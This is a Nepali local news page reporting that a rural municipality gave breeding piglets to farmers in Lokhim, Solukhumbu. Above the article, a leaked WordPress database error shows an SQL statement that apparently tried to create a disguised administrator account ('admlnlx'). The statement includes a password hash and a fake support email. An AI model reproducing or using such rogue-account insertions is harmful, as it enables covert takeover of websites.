WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOtGx3xfgAFMIYkz5HDi9NzCLw.tp21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:43:31', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशी गाउँपालिका लोखिमको कृषकलाई बंगुरको विर वितरण – Gaule Khabar

थुलुङ दुधकोशी गाउँपालिका लोखिमको कृषकलाई बंगुरको विर वितरण

थुलुङ दुधकोशी गाउँपालिका लोखिमको कृषकलाई बंगुरको विर वितरण

सोलुखुम्बु । सोलुखुम्बु थुलुङ दुधकोशी गाउँपालिका लोखिमका कृषकलाई बगुंरको पाठा विर वितरण गरिएको छ ।

थुलुङ दुधकोशी गाउँपालिकाको चालु आर्थिक वर्षको कार्यक्रम अनुसार वडा नं ९ लोखिमका कृषकलाई नश्ल सुधारका लागि कालो जातको १८ वटा बंगुरको पाठा विर वितरण गरिएको वडाध्यक्ष भुपाल सिंह राईले जानकारी दिए ।
व्यवसायिक रुपमा उत्पादन बढाउनका लागि यो कार्यक्रम सञ्चालन गरिएको हो । कार्यक्रम प्रभावकारी भएमा आगामी दिनमा निरन्तरता दिईने वडाध्यक्ष राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका